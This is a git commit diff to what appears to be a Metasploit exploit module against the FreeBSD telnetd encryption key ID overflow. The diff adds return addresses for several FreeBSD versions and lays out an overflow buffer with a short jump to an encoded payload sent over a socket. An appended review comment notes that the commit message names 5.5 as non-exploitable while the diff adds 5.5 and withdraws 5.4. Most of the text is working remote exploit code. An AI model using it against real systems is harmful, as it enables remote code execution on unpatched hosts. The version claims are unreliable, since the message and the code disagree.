More testing - looks like 5.5 is not exploitable, at least not the same way
unstable
HD Moore 2011-12-28 01:30:25 -06:00
parent e071944a1a
commit 1ff0cb2eef
1 changed files with 18 additions and 9 deletions


@ -46,12 +46,16 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx (needs testing)
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx (needs testing)
[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx (needs testing)
[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx (needs testing)
[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx (needs testing)
[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ] # call edx (needs testing)
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
# Version 5.4 does not seem to be exploitable (the crypto() function is not called)
# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => ''))
@ -67,6 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
enc_keyid = "\xff\xfa\x26\x07"
end_suboption = "\xff\xf0"
# Telnet protocol requires 0xff to be escaped with another
penc = payload.encoded.gsub("\xff", "\xff\xff")
key_id = Rex::Text.rand_text_alphanumeric(400)
@ -75,11 +80,14 @@ class Metasploit3 < Msf::Exploit::Remote
key_id[76, 4] = [ t['Ret'] ].pack("V")
# Some of these bytes can get mangled, jump over them
key_id[80,40] = "\x00" * 40
key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)
# Insert the real payload (ff -> ff ff)
key_id[120, penc.length] = penc
# Bounce to the real payload (avoid corruption)
key_id[120, 2] = "\xeb\x46"
# The actual payload
key_id[192, penc.length] = penc
# Create the Key ID command
sploit = enc_keyid + key_id + end_suboption
@ -112,6 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
# The second request results in the pointer being called
print_status("Sending second payload...")
sock.put(sploit)
handler
::IO.select(nil, nil, nil, 0.5)
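Review bot: The commit message says 5.5 looks non-exploitable, but the first hunk adds a `'FreeBSD 5.5'` target entry while the new comment beneath it withdraws 5.4 instead, so the message and the target list disagree about which version is unsupported. If 5.5 is the version that failed testing, the comment should read `# Version 5.5 does not seem to be exploitable (the crypto() function is not called)` and the 5.5 entry should be the commented-out one; if 5.4 is correct, the commit message is the part that needs fixing. The `(needs testing)` qualifiers are dropped from the 8.1 through 6.0 entries in the same hunk; if those have not actually been verified, the qualifier should stay so users of the module know which targets are confirmed. The `'DisclosureDate' => ''` context line is still empty and could be filled in the same pass. The `'Automatic'` target presumably selects one of these entries by detected version, but that code is outside the hunk, so confirm it cannot pick a withdrawn entry.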